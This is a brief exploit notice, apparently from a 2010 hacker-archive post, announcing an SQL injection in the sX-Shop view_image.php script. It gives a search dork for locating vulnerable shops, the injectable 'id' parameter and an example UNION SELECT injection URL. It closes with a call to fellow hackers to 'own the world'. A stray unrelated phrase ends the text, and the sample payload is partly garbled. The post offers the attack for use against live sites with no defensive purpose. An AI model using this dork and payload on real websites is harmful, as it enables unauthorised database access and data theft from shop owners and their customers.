############################################################################################################# ## sX-Shop/ view_image.php SQL Injection## ## Author : secret - mohammed.atta@hotmail.com ## ## Homepage : http://swissfaking.net/ ## ## Date : 05 August, 2010## ############################################################################################################# ____ ____ _____ ___ ____ ______ ____ ___ ______ / __// __// ___// _ \ / __//___//_// _ \ / _ |/ |/ / _\ \ / _/ / /__ / , _// _/ / /_/ / / , _// __ | // /___//___/ \___//_/|_|/___//_/____/___//_/|_|/_/ |_|/_/|_/ /___/ #################################################### # sX-Shop / view_image.php SQL Injection #################################################### # Discovered by : secret # Site: http://swissfaking.net/ # Dork: powered by sX-Shop ; inurl:"view_image.php" intext:sX-Shop # Vendor: http://www.source-worx.de/ # Version : *newest version* # Exploit : [site]/shop/view_image.php?id=[SQL Injection] # Tested on : XP - Linux e.g. http://www.site.com/shop/view_image.php?id=416+and+1=0+Union+Select(UNEXVISIBLECOLUMN)+2+3 ######################################################################################## #note : IRAN owns ;-) - to all iranian Hackers in the world, add me and let's own the world ;)
体验盒子
